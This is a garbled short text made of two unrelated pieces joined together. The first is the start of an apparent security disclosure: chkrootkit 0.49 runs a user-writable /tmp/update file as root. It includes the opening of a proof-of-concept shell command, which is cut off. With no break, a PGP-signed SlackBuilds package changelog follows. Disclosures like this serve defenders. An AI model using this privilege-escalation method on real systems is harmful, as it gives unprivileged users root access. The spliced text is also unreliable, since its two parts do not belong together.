Hi.
As ironic as it sounds, chkrootkit 0.49 can be turned into a
rootkit.
On systems where /tmp is not mounted noexec, a regular user can
create a
file /tmp/update which chkrootkit will execute with root privileges
each
time it's run.
Here's a simple PoC...as normal user:
$ echo -e '#!/bin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Wed Jun 4 23:23:05 UTC 2014
academic/calc: Updated for version 2.12.4.13 + new maintainer.
academic/gretl: Added (Econometric Analysis Software).
academic/mendeleydesktop: Updated for version 1.11.
desktop/dwm: Update README.CONFIG.
desktop/ee: Added